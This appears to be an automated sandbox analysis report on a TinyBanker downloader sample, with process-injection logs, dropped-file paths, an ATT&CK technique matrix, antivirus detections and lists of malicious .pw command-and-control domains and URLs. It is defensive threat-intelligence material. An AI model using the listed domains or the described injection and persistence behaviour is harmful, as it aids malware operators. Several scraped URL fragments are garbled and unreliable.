Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: AD0000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: 14B0000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: 1010000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: D90000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: F10000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: 6E0000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: 930000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: AD0000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: 2360000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: 970000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: 1050000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: 7B0000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: 1020000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: 9C0000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: 850000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: AA0000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: CE0000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: F70000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: FC0000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: B40000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: 20E0000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: 680000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: B30000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: 2870000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: 2CC0000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: 5A0000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: 2C60000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: 12F0000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: B50000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: 2280000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: A50000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: 1A0000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: A50000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: FD0000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: F90000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: 600000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: 1040000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: B30000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: 2C90000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: 1240000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: AB0000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: FD0000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: B30000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: FD0000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: AE0000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: 2380000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: B80000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: 7F0000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: 2DD0000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: 2F30000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: 1200000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: 2CE0000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: B90000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: 28C0000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: 1220000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: 900000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: F10000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: 28F0000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: 2820000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: F20000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: BE0000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: 2D80000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: E30000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: A60000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: 29B0000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: 540000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: B70000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: EE0000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: 740000
            Source: C:\Windows\explorer.exeMemory written: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe base: 1C0000Jump to behavior
            Source: C:\Windows\explorer.exeMemory written: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe base: 1C0000Jump to behavior
            Source: C:\Users\user\Desktop\java.exeProcess created: C:\Windows\SysWOW64\winver.exe winverJump to behavior
            Source: winver.exe, 00000002.00000002.2882940038.0000000002EEC000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: tShell_TrayWndv&!&
            Source: java.exe, 00000000.00000002.1652248579.0000000002230000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2912374874.0000000001340000.00000040.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000003.00000002.2928191346.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1632657325.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000004.00000000.1712559103.000001CD41220000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000003.00000000.1632391026.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2905026359.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
            Source: explorer.exe, 00000003.00000002.2928191346.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1632657325.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000004.00000000.1712559103.000001CD41220000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: winver.exe, 00000002.00000002.2882940038.0000000002EEC000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: tShell_TrayWnd
            Source: explorer.exe, 00000003.00000002.2928191346.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1632657325.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000004.00000000.1712559103.000001CD41220000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\java.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133502574394086727.txt VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exeQueries volume information: C:\ VolumeInformationJump to behavior
MITRE ATT&CK Matrix (each row lists one technique per tactic column; a number before a technique is the report's signature-count badge for that technique)

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact | Resource Development | Reconnaissance

Valid Accounts | 1 Exploitation for Client Execution | 11 Registry Run Keys / Startup Folder | 512 Process Injection | 3 Rootkit | 1 Credential API Hooking | 211 Security Software Discovery | Remote Services | 1 Credential API Hooking | Exfiltration Over Other Network Medium | 21 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Abuse Accessibility Features | Acquire Infrastructure | Gather Victim Identity Information

Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 11 Registry Run Keys / Startup Folder | 1 Masquerading | LSASS Memory | 1 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 11 Archive Collected Data | Exfiltration Over Bluetooth | 1 Ingress Tool Transfer | SIM Card Swap | Obtain Device Cloud Backups | Network Denial of Service | Domains | Credentials

Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Virtualization/Sandbox Evasion | Security Account Manager | 3 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 2 Non-Application Layer Protocol | Data Encrypted for Impact | DNS Server | Email Addresses

Local Accounts | Cron | Login Hook | Login Hook | 512 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | Traffic Duplication | 13 Application Layer Protocol | Data Destruction | Virtual Private Server | Employee Names

Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Scheduled Transfer | Fallback Channels | Data Encrypted for Impact | Server | Gather Victim Network Information

Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Hidden Files and Directories | Cached Domain Credentials | 111 System Information Discovery | VNC | GUI Input Capture | Data Transfer Size Limits | Multiband Communication | Service Stop | Botnet | Domain Properties

External Remote Services | Systemd Timers | Startup Items | Startup Items | 21 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over C2 Channel | Commonly Used Port | Inhibit System Recovery | Web Services | DNS

Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Exfiltration Over Alternative Protocol | Application Layer Protocol | Defacement | Serverless | Network Trust Dependencies

Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Web Protocols | Internal Defacement | Malvertising | Network Topology

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
Behavior Graph ID: 1378065 | Sample: java.exe | Startdate: 20/01/2024 | Architecture: WINDOWS | Score: 100

Start
  Domains/IPs: vcklmnnejwxx.pw; uyhgqunqkxnx.pw; 7 other IPs or domains
  Signatures: Snort IDS alert for network traffic; Multi AV Scanner detection for domain / URL; Antivirus detection for URL or domain; 7 other signatures
  -> java.exe (1) started
       Signatures: Exploit detected, runtime environment starts unknown processes; Writes to foreign memory regions
       -> winver.exe (1 4) started
            Domains/IPs: fkmmvfeonnyh.pw 216.218.185.162, ports 49735, 49737, 49738, HURRICANEUS United States; uyhgqunqkxnx.pw 178.62.201.34, ports 49736, 80, DIGITALOCEAN-ASNUS European Union
            Dropped: C:\Users\user\AppData\Roaming\...\bin.exe, PE32
            Signatures: Creates autostart registry keys with suspicious names; Contains functionality to inject threads in other processes; Injects code into the Windows Explorer (explorer.exe); 4 other signatures
            -> explorer.exe (15 8) injected
                 Signatures: Contains functionality to inject threads in other processes; Writes to foreign memory regions; Creates a thread in another existing process (thread injection)
                 -> bin.exe (1) started
                      Signatures: Antivirus detection for dropped file; Machine Learning detection for dropped file
                      -> conhost.exe started
                 -> bin.exe (1) started
                      -> conhost.exe started
            -> SearchApp.exe (13) injected
                 IP: 173.222.162.32, ports 443, 49730, AKAMAI-ASUS United States
                 Signatures: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            -> sihost.exe injected
            -> 33 other processes injected
       -> conhost.exe started

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample
Source | Detection | Scanner | Label
java.exe | 89% | ReversingLabs | Win32.Downloader.TinyBanker
java.exe | 90% | Virustotal |
java.exe | 100% | Avira | HEUR/AGEN.1322420
java.exe | 100% | Joe Sandbox ML |

Dropped Files
Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe | 100% | Avira | HEUR/AGEN.1322420
C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe | 100% | Joe Sandbox ML |

No Antivirus matches

Domains
Source | Detection | Scanner | Label
vcklmnnejwxx.pw | 14% | Virustotal |
uyhgqunqkxnx.pw | 13% | Virustotal |
mfueeimvyrsp.pw | 18% | Virustotal |
cmnsgscccrej.pw | 13% | Virustotal |
utmyhnffxpcj.pw | 18% | Virustotal |
spaines.pw | 15% | Virustotal |
fkmmvfeonnyh.pw | 18% | Virustotal |
gfnlmtcolrrb.pw | 13% | Virustotal |
evbsdqvgmpph.pw | 16% | Virustotal |

URLs
Source | Detection | Scanner | Label
https://aefd.nelreports.net/api/report?cat=bingaotak | 0% | URL Reputation | safe
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/ | 0% | URL Reputation | safe
https://%s.xboxlive.com | 0% | URL Reputation | safe
https://aefd.nelreports.net/api/report?cat=bingrms | 0% | URL Reputation | safe
https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img | 0% | URL Reputation | safe
https://outlook.com_ | 0% | URL Reputation | safe
https://powerpoint.office.comcember | 0% | URL Reputation | safe
http://schemas.micro | 0% | URL Reputation | safe
https://login.windows.local | 0% | URL Reputation | safe
https://aefd.nelreports.net/api/report?cat=wsb | 0% | URL Reputation | safe
https://%s.dnet.xboxlive.com | 0% | URL Reputation | safe
http://uyhgqunqkxnx.pw/EiDQjNbWEQ/ | 13% | Virustotal |
http://spaines.pw/EiDQjNbWEQ/ | 100% | Avira URL Cloud | malware
http://uyhgqunqkxnx.pw/EiDQjNbWEQ/ | 100% | Avira URL Cloud | malware
https://www.ng.com | 0% | Avira URL Cloud | safe
http://evbsdqvgmpph.pw/EiDQjNbWEQ/ | 100% | Avira URL Cloud | malware
https://powerpoint.office.comxee | 0% | Avira URL Cloud | safe
http://cmnsgscccrej.pw/EiDQjNbWEQ/ | 100% | Avira URL Cloud | malware
http://cmnsgscccrej.pw/EiDQjNbWEQ/ | 17% | Virustotal |
https://unitedstates4.ss.wd.microsoft.us | 0% | Avira URL Cloud | safe
http://mfueeimvyrsp.pw/EiDQjNbWEQ/ | 100% | Avira URL Cloud | malware
https://unitedstates2.ss.wd.microsoft.us | 0% | Avira URL Cloud | safe
http://evbsdqvgmpph.pw/EiDQjNbWEQ/ | 15% | Virustotal |
https://unitedstates1.ss.wd.microsoft.us | 0% | Avira URL Cloud | safe
https://searchapp.bundleassets.example/desktop/2.html | 0% | Avira URL Cloud | safe
https://assets.activity.windows.comer | 0% | Avira URL Cloud | safe
https://unitedstates2.ss.wd.microsoft.us | 0% | Virustotal |
https://assets.activity.windows.coms | 0% | Avira URL Cloud | safe
http://mfueeimvyrsp.pw/EiDQjNbWEQ/ | 9% | Virustotal |
https://activity.windows.comt | 0% | Avira URL Cloud | safe
https://unitedstates1.ss.wd.microsoft.us | 1% | Virustotal |
http://spaines.pw/EiDQjNbWEQ/ | 12% | Virustotal |
https://login.windows.local/ | 0% | Avira URL Cloud | safe
http://gfnlmtcolrrb.pw/EiDQjNbWEQ/ | 100% | Avira URL Cloud | malware
http://vcklmnnejwxx.pw/EiDQjNbWEQ/ | 100% | Avira URL Cloud | malware
https://unitedstates4.ss.wd.microsoft.us | 1% | Virustotal |
http://fkmmvfeonnyh.pw/EiDQjNbWEQ/ | 100% | Avira URL Cloud | malware
https://excel.office.comcp | 0% | Avira URL Cloud | safe
